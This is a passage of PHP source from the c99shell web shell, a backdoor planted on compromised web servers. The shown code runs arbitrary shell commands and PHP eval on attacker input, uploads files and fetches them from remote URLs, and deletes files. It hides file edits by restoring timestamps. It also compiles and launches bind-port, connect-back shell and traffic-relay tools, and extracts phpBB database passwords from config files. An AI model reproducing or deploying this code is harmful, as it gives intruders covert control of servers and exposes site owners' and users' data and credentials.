$destin = $uploadfile["name"]; } else { $destin = $userfilename; } if (!move_uploaded_file($uploadfile["tmp_name"], $uploadpath . $destin)) { $uploadmess .= "Error uploading file " . $uploadfile["name"] . " (can't copy \"" . $uploadfile["tmp_name"] . "\" to \"" . $uploadpath . $destin . "\"! "; } } elseif (!empty($uploadurl)) { if (!empty($uploadfilename)) { $destin = $uploadfilename; } else { $destin = explode("/", $destin); $destin = $destin[count($destin) - 1]; if (empty($destin)) { $i = 0; $b = ""; while (file_exists($uploadpath . $destin)) { if ($i > 0) { $b = "_" . $i; } $destin = "index" . $b . ".html"; $i++; } } } if ((!preg_match("http://", $uploadurl)) and (!preg_match("https://", $uploadurl)) and (!preg_match("ftp://", $uploadurl))) { echo "Incorect url! "; } else { $st = getmicrotime(); $content = @file_get_contents($uploadurl); $dt = round(getmicrotime() - $st, 4); if (!$content) { $uploadmess .= "Can't download file! "; } else { if ($filestealth) { $stat = stat($uploadpath . $destin); } $fp = fopen($uploadpath . $destin, "w"); if (!$fp) { $uploadmess .= "Error writing to file " . htmlspecialchars($destin) . "! "; } else { fwrite($fp, $content, strlen($content)); fclose($fp); if ($filestealth) { touch($uploadpath . $destin, $stat[9], $stat[8]); } } } } } } if ($miniform) { echo "" . $uploadmess . ""; $act = "ls"; } else { echo "File upload: " . $uploadmess . " Select file on your local computer:                or Input URL: Save this file dir: File-name (auto-fill):  convert file name to lovercase "; } } if ($act == "delete") { $delerr = ""; foreach ($actbox as $v) { $result = false; $result = fs_rmobj($v); if (!$result) { $delerr .= "Can't delete " . htmlspecialchars($v) . " "; } } if (!empty($delerr)) { echo "Deleting with errors: " . $delerr; } $act = "ls"; } if (!$usefsbuff) { if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) { echo "Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE."; } } else { if ($act == "copy") { $err = ""; $sess_data["copy"] = array_merge($sess_data["copy"], $actbox); c99_sess_put($sess_data); $act = "ls"; } elseif ($act == "cut") { $sess_data["cut"] = array_merge($sess_data["cut"], $actbox); c99_sess_put($sess_data); $act = "ls"; } elseif ($act == "unselect") { foreach ($sess_data["copy"] as $k => $v) { if (in_array($v, $actbox)) { unset($sess_data["copy"][$k]); } } foreach ($sess_data["cut"] as $k => $v) { if (in_array($v, $actbox)) { unset($sess_data["cut"][$k]); } } c99_sess_put($sess_data); $act = "ls"; } if ($actemptybuff) { $sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data); } elseif ($actpastebuff) { $psterr = ""; foreach ($sess_data["copy"] as $k => $v) { $to = $d . basename($v); if (!fs_copy_obj($v, $to)) { $psterr .= "Can't copy " . $v . " to " . $to . "! "; } if ($copy_unset) { unset($sess_data["copy"][$k]); } } foreach ($sess_data["cut"] as $k => $v) { $to = $d . basename($v); if (!fs_move_obj($v, $to)) { $psterr .= "Can't move " . $v . " to " . $to . "! "; } unset($sess_data["cut"][$k]); } c99_sess_put($sess_data); if (!empty($psterr)) { echo "Pasting with errors: " . $psterr; } $act = "ls"; } elseif ($actarcbuff) { $arcerr = ""; if (substr($actarcbuff_path, -7, 7) == ".tar.gz") { $ext = ".tar.gz"; } else { $ext = ".tar.gz"; } if ($ext == ".tar.gz") { $cmdline = "tar cfzv"; } $cmdline .= " " . $actarcbuff_path; $objects = array_merge($sess_data["copy"], $sess_data["cut"]); foreach ($objects as $v) { $v = str_replace("\\", DIRECTORY_SEPARATOR, $v); if (substr($v, 0, strlen($d)) == $d) { $v = basename($v); } if (is_dir($v)) { if (substr($v, -1) != DIRECTORY_SEPARATOR) { $v .= DIRECTORY_SEPARATOR; } $v .= "*"; } $cmdline .= " " . $v; } $tmp = realpath("."); chdir($d); $ret = myshellexec($cmdline); chdir($tmp); if (empty($ret)) { $arcerr .= "Can't call archivator (" . htmlspecialchars(str2mini($cmdline, 60)) . ")! "; } $ret = str_replace("\r\n", "\n", $ret); $ret = explode("\n", $ret); if ($copy_unset) { foreach ($sess_data["copy"] as $k => $v) { unset($sess_data["copy"][$k]); } } foreach ($sess_data["cut"] as $k => $v) { if (in_array($v, $ret)) { fs_rmobj($v); } unset($sess_data["cut"][$k]); } c99_sess_put($sess_data); if (!empty($arcerr)) { echo "Archivation errors: " . $arcerr; } $act = "ls"; } elseif ($actpastebuff) { $psterr = ""; foreach ($sess_data["copy"] as $k => $v) { $to = $d . basename($v); if (!fs_copy_obj($v, $d)) { $psterr .= "Can't copy " . $v . " to " . $to . "! "; } if ($copy_unset) { unset($sess_data["copy"][$k]); } } foreach ($sess_data["cut"] as $k => $v) { $to = $d . basename($v); if (!fs_move_obj($v, $d)) { $psterr .= "Can't move " . $v . " to " . $to . "! "; } unset($sess_data["cut"][$k]); } c99_sess_put($sess_data); if (!empty($psterr)) { echo "Pasting with errors: " . $psterr; } $act = "ls"; } } if ($act == "cmd") { if (trim($cmd) == "ps -aux") { $act = "processes"; } elseif (trim($cmd) == "tasklist") { $act = "processes"; } else { @chdir($chdir); if (!empty($submit)) { echo "Result of execution this command: "; $olddir = realpath("."); @chdir($d); $ret = myshellexec($cmd); $ret = convert_cyr_string($ret, "d", "w"); if ($cmd_txt) { $rows = count(explode("\r\n", $ret)) + 1; if ($rows < 10) { $rows = 10; } echo " " . htmlspecialchars($ret) . ""; } else { echo $ret . " "; } @chdir($olddir); } else { echo "Execution command"; if (empty($cmd_txt)) { $cmd_txt = true; } } echo " " . htmlspecialchars($cmd) . "  Display in text-area  "; } } if ($act == "ls") { if (count($ls_arr) > 0) { $list = $ls_arr; } else { $list = array(); if ($h = @opendir($d)) { while (($o = readdir($h)) !== false) { $list[] = $d . $o; } closedir($h); } else { } } if (count($list) == 0) { echo "Can't open folder (" . htmlspecialchars($d) . ")!"; } else { $objects = array(); $vd = "f"; if ($vd == "f") { $objects["head"] = array(); $objects["folders"] = array(); $objects["links"] = array(); $objects["files"] = array(); foreach ($list as $v) { $o = basename($v); $row = array(); if ($o == ".") { $row[] = $d . $o; $row[] = "LINK"; } elseif ($o == "..") { $row[] = $d . $o; $row[] = "LINK"; } elseif (is_dir($v)) { if (is_link($v)) { $type = "LINK"; } else { $type = "DIR"; } $row[] = $v; $row[] = $type; } elseif (is_file($v)) { $row[] = $v; $row[] = filesize($v); } $row[] = filemtime($v); if (!$win) { $ow = posix_getpwuid(fileowner($v)); $gr = posix_getgrgid(filegroup($v)); $row[] = ($ow["name"] ? $ow["name"] : fileowner($v)) . "/" . ($gr["name"] ? $gr["name"] : filegroup($v)); } $row[] = fileperms($v); if (($o == ".") or ($o == "..")) { $objects["head"][] = $row; } elseif (is_link($v)) { $objects["links"][] = $row; } elseif (is_dir($v)) { $objects["folders"][] = $row; } elseif (is_file($v)) { $objects["files"][] = $row; } $i++; } $row = array(); $row[] = "Name"; $row[] = "Size"; $row[] = "Modify"; if (!$win) { $row[] = "Owner/Group"; } $row[] = "Perms"; $row[] = "Action"; $parsesort = parsesort($sort); $sort = $parsesort[0] . $parsesort[1]; $k = $parsesort[0]; if ($parsesort[1] != "a") { $parsesort[1] = "d"; } $y = ""; $y .= ""; $row[$k] .= $y; for ($i = 0;$i < count($row) - 1;$i++) { if ($i != $k) { $row[$i] = "" . $row[$i] . ""; } } $v = $parsesort[0]; usort($objects["folders"], "tabsort"); usort($objects["links"], "tabsort"); usort($objects["files"], "tabsort"); if ($parsesort[1] == "d") { $objects["folders"] = array_reverse($objects["folders"]); $objects["files"] = array_reverse($objects["files"]); } $objects = array_merge($objects["head"], $objects["folders"], $objects["links"], $objects["files"]); $tab = array(); $tab["cols"] = array( $row ); $tab["head"] = array(); $tab["folders"] = array(); $tab["links"] = array(); $tab["files"] = array(); $i = 0; foreach ($objects as $a) { $v = $a[0]; $o = basename($v); $dir = dirname($v); if ($disp_fullpath) { $disppath = $v; } else { $disppath = $o; } $disppath = str2mini($disppath, 60); if (in_array($v, $sess_data["cut"])) { $disppath = "" . $disppath . ""; } elseif (in_array($v, $sess_data["copy"])) { $disppath = "" . $disppath . ""; } foreach ($regxp_highlight as $r) { if (preg_match($r[0], $o)) { if ((!is_numeric($r[1])) or ($r[1] > 3)) { $r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[" . $k . "][0] - unknown command."; c99shexit(); } else { $r[1] = round($r[1]); $isdir = is_dir($v); if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) { if (empty($r[2])) { $r[2] = ""; $r[3] = ""; } $disppath = $r[2] . $disppath . $r[3]; if ($r[4]) { break; } } } } } $uo = urlencode($o); $ud = urlencode($dir); $uv = urlencode($v); $row = array(); if ($o == ".") { $row[] = " " . $o . ""; $row[] = "LINK"; } elseif ($o == "..") { $row[] = " " . $o . ""; $row[] = "LINK"; } elseif (is_dir($v)) { if (is_link($v)) { $disppath .= " => " . readlink($v); $type = "LINK"; $row[] = " [" . $disppath . "]"; } else { $type = "DIR"; $row[] = " [" . $disppath . "]"; } $row[] = $type; } elseif (is_file($v)) { $ext = explode(".", $o); $c = count($ext) - 1; $ext = $ext[$c]; $ext = strtolower($ext); $row[] = " " . $disppath . ""; $row[] = view_size($a[1]); } $row[] = date("d.m.Y H:i:s", $a[2]); if (!$win) { $row[] = $a[3]; } $row[] = "" . view_perms_color($v) . ""; if ($o == ".") { $checkbox = ""; $i--; } else { $checkbox = ""; } if (is_dir($v)) { $row[] = " " . $checkbox; } else { $row[] = "   " . $checkbox; } if (($o == ".") or ($o == "..")) { $tab["head"][] = $row; } elseif (is_link($v)) { $tab["links"][] = $row; } elseif (is_dir($v)) { $tab["folders"][] = $row; } elseif (is_file($v)) { $tab["files"][] = $row; } $i++; } } $table = array_merge($tab["cols"], $tab["head"], $tab["folders"], $tab["links"], $tab["files"]); echo "Listing folder (" . count($tab["files"]) . " files and " . (count($tab["folders"]) + count($tab["links"])) . " folders): "; foreach ($table as $row) { echo "\r\n"; foreach ($row as $v) { echo "\r\n"; } echo "\r\n"; } echo " " . $v . "    "; if (count(array_merge($sess_data["copy"], $sess_data["cut"])) > 0 and ($usefsbuff)) { echo "                   "; } echo "With selected:"; echo "Delete"; echo "Change-mode"; if ($usefsbuff) { echo "Cut"; echo "Copy"; echo "Unselect"; } echo "  "; echo ""; } } if ($act == "tools") { $bndportsrcs = array( "c99sh_bindport.pl" => array( "Using PERL", "perl %path %port" ) , "c99sh_bindport.c" => array( "Using C", "%path %port %pass" ) ); $bcsrcs = array( "c99sh_backconn.pl" => array( "Using PERL", "perl %path %host %port" ) , "c99sh_backconn.c" => array( "Using C", "%path %host %port" ) ); $dpsrcs = array( "c99sh_datapipe.pl" => array( "Using PERL", "perl %path %localport %remotehost %remoteport" ) , "c99sh_datapipe.c" => array( "Using C", "%path %localport %remoteport %remotehost" ) ); if (!is_array($bind)) { $bind = array(); } if (!is_array($bc)) { $bc = array(); } if (!is_array($datapipe)) { $datapipe = array(); } if (!is_numeric($bind["port"])) { $bind["port"] = $bindport_port; } if (empty($bind["pass"])) { $bind["pass"] = $bindport_pass; } if (empty($bc["host"])) { $bc["host"] = getenv("REMOTE_ADDR"); } if (!is_numeric($bc["port"])) { $bc["port"] = $bc_port; } if (empty($datapipe["remoteaddr"])) { $datapipe["remoteaddr"] = "irc.dalnet.ru:6667"; } if (!is_numeric($datapipe["localport"])) { $datapipe["localport"] = $datapipe_localport; } if (!empty($bindsubmit)) { echo "Result of binding port: "; $v = $bndportsrcs[$bind["src"]]; if (empty($v)) { echo "Unknown file! "; } elseif (fsockopen(getenv("SERVER_ADDR") , $bind["port"], $errno, $errstr, 0.1)) { echo "Port alredy in use, select any other! "; } else { $w = explode(".", $bind["src"]); $ext = $w[count($w) - 1]; unset($w[count($w) - 1]); $srcpath = join(".", $w) . "." . rand(0, 999) . "." . $ext; $binpath = $tmpdir . join(".", $w) . rand(0, 999); if ($ext == "pl") { $binpath = $srcpath; } @unlink($srcpath); $fp = fopen($srcpath, "ab+"); if (!$fp) { echo "Can't write sources to \"" . $srcpath . "\"! "; } elseif (!$data = c99getsource($bind["src"])) { echo "Can't download sources!"; } else { fwrite($fp, $data, strlen($data)); fclose($fp); if ($ext == "c") { $retgcc = myshellexec("gcc -o " . $binpath . " " . $srcpath); @unlink($srcpath); } $v[1] = str_replace("%path", $binpath, $v[1]); $v[1] = str_replace("%port", $bind["port"], $v[1]); $v[1] = str_replace("%pass", $bind["pass"], $v[1]); $v[1] = str_replace("//", "/", $v[1]); $retbind = myshellexec($v[1] . " > /dev/null &"); sleep(5); $sock = fsockopen("localhost", $bind["port"], $errno, $errstr, 5); if (!$sock) { echo "I can't connect to localhost:" . $bind["port"] . "! I think you should configure your firewall."; } else { echo "Binding... ok! Connect to " . getenv("SERVER_ADDR") . ":" . $bind["port"] . "! You should use NetCat©, run \"nc -v " . getenv("SERVER_ADDR") . " " . $bind["port"] . "\"!View binder's process"; } } echo " "; } } if (!empty($bcsubmit)) { echo "Result of back connection: "; $v = $bcsrcs[$bc["src"]]; if (empty($v)) { echo "Unknown file! "; } else { $w = explode(".", $bc["src"]); $ext = $w[count($w) - 1]; unset($w[count($w) - 1]); $srcpath = join(".", $w) . "." . rand(0, 999) . "." . $ext; $binpath = $tmpdir . join(".", $w) . rand(0, 999); if ($ext == "pl") { $binpath = $srcpath; } @unlink($srcpath); $fp = fopen($srcpath, "ab+"); if (!$fp) { echo "Can't write sources to \"" . $srcpath . "\"! "; } elseif (!$data = c99getsource($bc["src"])) { echo "Can't download sources!"; } else { fwrite($fp, $data, strlen($data)); fclose($fp); if ($ext == "c") { $retgcc = myshellexec("gcc -o " . $binpath . " " . $srcpath); @unlink($srcpath); } $v[1] = str_replace("%path", $binpath, $v[1]); $v[1] = str_replace("%host", $bc["host"], $v[1]); $v[1] = str_replace("%port", $bc["port"], $v[1]); $v[1] = str_replace("//", "/", $v[1]); $retbind = myshellexec($v[1] . " > /dev/null &"); echo "Now script try connect to " . htmlspecialchars($bc["host"]) . ":" . htmlspecialchars($bc["port"]) . "... "; } } } if (!empty($dpsubmit)) { echo "Result of datapipe-running: "; $v = $dpsrcs[$datapipe["src"]]; if (empty($v)) { echo "Unknown file! "; } elseif (fsockopen(getenv("SERVER_ADDR") , $datapipe["port"], $errno, $errstr, 0.1)) { echo "Port alredy in use, select any other! "; } else { $srcpath = $tmpdir . $datapipe["src"]; $w = explode(".", $datapipe["src"]); $ext = $w[count($w) - 1]; unset($w[count($w) - 1]); $srcpath = join(".", $w) . "." . rand(0, 999) . "." . $ext; $binpath = $tmpdir . join(".", $w) . rand(0, 999); if ($ext == "pl") { $binpath = $srcpath; } @unlink($srcpath); $fp = fopen($srcpath, "ab+"); if (!$fp) { echo "Can't write sources to \"" . $srcpath . "\"! "; } elseif (!$data = c99getsource($datapipe["src"])) { echo "Can't download sources!"; } else { fwrite($fp, $data, strlen($data)); fclose($fp); if ($ext == "c") { $retgcc = myshellexec("gcc -o " . $binpath . " " . $srcpath); @unlink($srcpath); } list($datapipe["remotehost"], $datapipe["remoteport"]) = explode(":", $datapipe["remoteaddr"]); $v[1] = str_replace("%path", $binpath, $v[1]); $v[1] = str_replace("%localport", $datapipe["localport"], $v[1]); $v[1] = str_replace("%remotehost", $datapipe["remotehost"], $v[1]); $v[1] = str_replace("%remoteport", $datapipe["remoteport"], $v[1]); $v[1] = str_replace("//", "/", $v[1]); $retbind = myshellexec($v[1] . " > /dev/null &"); sleep(5); $sock = fsockopen("localhost", $datapipe["port"], $errno, $errstr, 5); if (!$sock) { echo "I can't connect to localhost:" . $datapipe["localport"] . "! I think you should configure your firewall."; } else { echo "Running datapipe... ok! Connect to " . getenv("SERVER_ADDR") . ":" . $datapipe["port"] . ", and you will connected to " . $datapipe["remoteaddr"] . "! You should use NetCat©, run \"nc -v " . getenv("SERVER_ADDR") . " " . $bind["port"] . "\"!View datapipe process"; } } echo " "; } } ?>Binding port: Port: "> Password: ">  $v) { echo "" . $v[0] . ""; } ?>  Back connection: HOST: "> Port: ">  $v) { echo "" . $v[0] . ""; } ?>  Click "Connect" only after open port for it. You should use NetCat©, run "nc -l -n -v -p "! Datapipe: HOST: "> Local port: ">  $v) { echo "" . $v[0] . ""; } ?>  Note: sources will be downloaded from remote server.Processes: "; if (!$win) { $handler = "ps -aux" . ($grep ? " | grep '" . addslashes($grep) . "'" : ""); } else { $handler = "tasklist"; } $ret = myshellexec($handler); if (!$ret) { echo "Can't execute \"" . $handler . "\"!"; } else { if (empty($processes_sort)) { $processes_sort = $sort_default; } $parsesort = parsesort($processes_sort); if (!is_numeric($parsesort[0])) { $parsesort[0] = 0; } $k = $parsesort[0]; if ($parsesort[1] != "a") { $y = ""; } else { $y = ""; } $ret = htmlspecialchars($ret); if (!$win) { if ($pid) { if (is_null($sig)) { $sig = 9; } echo "Sending signal " . $sig . " to #" . $pid . "... "; if (posix_kill($pid, $sig)) { echo "OK."; } else { echo "ERROR."; } } while (preg_match(" ", $ret)) { $ret = str_replace(" ", " ", $ret); } $stack = explode("\n", $ret); $head = explode(" ", $stack[0]); unset($stack[0]); for ($i = 0;$i < count($head);$i++) { if ($i != $k) { $head[$i] = "" . $head[$i] . ""; } } $prcs = array(); foreach ($stack as $line) { if (!empty($line)) { echo "

"; foreach ($tab as $i => $k) { echo ""; foreach ($k as $j => $v) { if ($win and $i > 0 and $j == 2) { $v = view_size($v); } echo ""; } echo ""; } echo "

" . $v . "

"; } } if ($act == "eval") { if (!empty($eval)) { echo "Result of execution this PHP-code:
"; $tmp = ob_get_contents(); $olddir = realpath("."); @chdir($d); if ($tmp) { ob_clean(); eval($eval); $ret = ob_get_contents(); $ret = convert_cyr_string($ret, "d", "w"); ob_clean(); echo $tmp; if ($eval_txt) { $rows = count(explode("\r\n", $ret)) + 1; if ($rows < 10) { $rows = 10; } echo "
" . htmlspecialchars($ret) . ""; } else { echo $ret . "
"; } } else { if ($eval_txt) { echo "
"; eval($eval); echo ""; } else { echo $ret; } } @chdir($olddir); } else { echo "Execution PHP-code"; if (empty($eval_txt)) { $eval_txt = true; } } echo "

" . htmlspecialchars($eval) . "

 Display in text-area 

"; } if ($act == "f") { if ((!is_readable($d . $f) or is_dir($d . $f)) and $ft != "edit") { if (file_exists($d . $f)) { echo "Permision denied (" . htmlspecialchars($d . $f) . ")!"; } else { echo "File does not exists (" . htmlspecialchars($d . $f) . ")!
Create"; } } else { $r = @file_get_contents($d . $f); $ext = explode(".", $f); $c = count($ext) - 1; $ext = $ext[$c]; $ext = strtolower($ext); $rft = ""; foreach ($ftypes as $k => $v) { if (in_array($ext, $v)) { $rft = $k; break; } } if (preg_match("sess_(.*)", $f)) { $rft = "phpsess"; } if (empty($ft)) { $ft = $rft; } $arr = array( array( "", "info" ) , array( "", "html" ) , array( "", "txt" ) , array( "Code", "code" ) , array( "Session", "phpsess" ) , array( "", "exe" ) , array( "SDB", "sdb" ) , array( "", "img" ) , array( "", "ini" ) , array( "", "download" ) , array( "", "notepad" ) , array( "", "edit" ) ); echo "Viewing file:     " . $f . " (" . view_size(filesize($d . $f)) . ")      " . view_perms_color($d . $f) . "
Select action/file-type:
"; foreach ($arr as $t) { if ($t[1] == $rft) { echo " " . $t[0] . ""; } elseif ($t[1] == $ft) { echo " " . $t[0] . ""; } else { echo " " . $t[0] . ""; } echo " (+) |"; } echo "

---

"; if ($ft == "info") { echo "Information:"; if (!$win) { echo "

Path	" . $d . $f . "
Size	" . view_size(filesize($d . $f)) . "
MD5	" . md5_file($d . $f) . "
Owner/Group	"; $ow = posix_getpwuid(fileowner($d . $f)); $gr = posix_getgrgid(filegroup($d . $f)); echo ($ow["name"] ? $ow["name"] : fileowner($d . $f)) . "/" . ($gr["name"] ? $gr["name"] : filegroup($d . $f)); } echo "
Perms	" . view_perms_color($d . $f) . "
Create time	" . date("d/m/Y H:i:s", filectime($d . $f)) . "
Access time	" . date("d/m/Y H:i:s", fileatime($d . $f)) . "
MODIFY time	" . date("d/m/Y H:i:s", filemtime($d . $f)) . "

"; $fi = fopen($d . $f, "rb"); if ($fi) { if ($fullhexdump) { echo "FULL HEXDUMP"; $str = fread($fi, filesize($d . $f)); } else { echo "HEXDUMP PREVIEW"; $str = fread($fi, $hexdump_lines * $hexdump_rows); } $n = 0; $a0 = "00000000
"; $a1 = ""; $a2 = ""; for ($i = 0;$i < strlen($str);$i++) { $a1 .= sprintf("%02X", ord($str[$i])) . " "; switch (ord($str[$i])) { case 0: $a2 .= "0"; break; case 32: case 10: case 13: $a2 .= " "; break; default: $a2 .= htmlspecialchars($str[$i]); } $n++; if ($n == $hexdump_rows) { $n = 0; if ($i + 1 < strlen($str)) { $a0 .= sprintf("%08X", $i + 1) . "
"; } $a1 .= "
"; $a2 .= "
"; } } echo "

" . $a0 . "

" . $a1 . "

" . $a2 . "

"; } $encoded = ""; if ($base64 == 1) { echo "Base64 Encode
"; $encoded = base64_encode(file_get_contents($d . $f)); } elseif ($base64 == 2) { echo "Base64 Encode + Chunk
"; $encoded = chunk_split(base64_encode(file_get_contents($d . $f))); } elseif ($base64 == 3) { echo "Base64 Encode + Chunk + Quotes
"; $encoded = base64_encode(file_get_contents($d . $f)); $encoded = substr(preg_replace("!.{1,76}!", "'\\0'.\n", $encoded) , 0, -2); } elseif ($base64 == 4) { $text = file_get_contents($d . $f); $encoded = base64_decode($text); echo "Base64 Decode"; if (base64_encode($encoded) != $text) { echo " (failed)"; } echo "
"; } if (!empty($encoded)) { echo "" . htmlspecialchars($encoded) . "

"; } echo "HEXDUMP: [Full] [Preview]
Base64: [Encode]  [+chunk]  [+chunk+quotes]  [Decode] 

"; } elseif ($ft == "html") { if ($white) { @ob_clean(); } echo $r; if ($white) { c99shexit(); } } elseif ($ft == "txt") { echo "

" . htmlspecialchars($r) . "

"; } elseif ($ft == "ini") { echo "

";
                var_dump(parse_ini_file($d . $f, true));
                echo "

"; } elseif ($ft == "phpsess") { echo "

";
                $v = explode("|", $r);
                echo $v[0] . "
";
                var_dump(unserialize($v[1]));
                echo "

"; } elseif ($ft == "exe") { $ext = explode(".", $f); $c = count($ext) - 1; $ext = $ext[$c]; $ext = strtolower($ext); $rft = ""; foreach ($exeftypes as $k => $v) { if (in_array($ext, $v)) { $rft = $k; break; } } $cmd = str_replace("%f%", $f, $rft); echo "Execute file:

Display in text-area

"; } elseif ($ft == "sdb") { echo "

";
                var_dump(unserialize(base64_decode($r)));
                echo "

"; } elseif ($ft == "code") { if (preg_match("php" . "BB 2.(.*) auto-generated config file", $r)) { $arr = explode("\n", $r); if (count($arr == 18)) { include ($d . $f); echo "phpBB configuration is detected in this file!
"; if ($dbms == "mysql4") { $dbms = "mysql"; } if ($dbms == "mysql") { echo "Connect to DB

"; } else { echo "But, you can't connect to forum sql-base, because db-software=\"" . $dbms . "\" is not supported by c99shell. Please, report us for fix."; } echo "Parameters for manual connect:
"; $cfgvars = array( "dbms" => $dbms, "dbhost" => $dbhost, "dbname" => $dbname, "dbuser" => $dbuser, "dbpasswd" => $dbpasswd ); foreach ($cfgvars as $k => $v) { echo htmlspecialchars($k) . "='" . htmlspecialchars($v) . "'
"; } echo "

---

"; } } echo "

"; if (!empty($white)) { @ob_clean(); } highlight_file($d . $f); if (!empty($white)) { c99shexit(); } echo "

"; } elseif ($ft == "download") { @ob_clean(); header("Content-type: application/octet-stream"); header("Content-length: " . filesize($d . $f)); header("Content-disposition: attachment; filename=\"" . $f . "\";"); echo $r; exit; } elseif ($ft == "notepad") { @ob_clean(); header("Content-type: text/plain"); header("Content-disposition: attachment; filename=\"" . $f . ".txt\";"); echo ($r); exit; } elseif ($ft == "img") { $inf = getimagesize($d . $f); if (!$white) { if (empty($imgsize)) { $imgsize = 20; } $width = $inf[0] / 100 * $imgsize; $height = $inf[1] / 100 * $imgsize; echo "Size: "; $sizes = array( "100", "50", "20" ); foreach ($sizes as $v) { echo ""; if ($imgsize != $v) { echo $v; } else { echo "" . $v . ""; } echo "   "; } echo "

"; } else { @ob_clean(); $ext = explode($f, "."); $ext = $ext[count($ext) - 1]; header("Content-type: " . $inf["mime"]); readfile($d . $f); exit; } } elseif ($ft == "edit") { if (!empty($submit)) { if ($filestealth) { $stat = stat($d . $f); } $fp = fopen($d . $f, "w"); if (!$fp) { echo "Can't write to file!"; } else { echo "Saved!"; fwrite($fp, $edit_text); fclose($fp); if ($filestealth) { touch($d . $f, $stat[9], $stat[8]); } $r = $edit_text; } } $rows = count(explode("\r\n", $r)); if ($rows < 10) { $rows = 10; } if ($rows > 30) { $rows = 30; } echo "

  
" . htmlspecialchars($r) . "

"; } elseif (!empty($ft)) { echo "Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS."; } else { echo "Unknown extension (" . $ext . "), please, select type manually."; } } } } else { @ob_clean(); $images = array( "arrow_ltr" => "R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQSIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", "back" => "R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqtWg0JADs=", "buffer" => "R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANoeLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmDDlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", "change" => "R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEAAB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOCwSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgACHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDLzMshADs=", "delete" => "R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCwsGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWvvHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42VlZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8GBZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQjwVFHBgiEGQFIgQasYkcSbJQIAA7", "download" => "R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7puEYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", "forward" => "R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqtWqsJADs=", "home" => "R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWSkrqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/jVwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", "mode" => "R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", "refresh" => 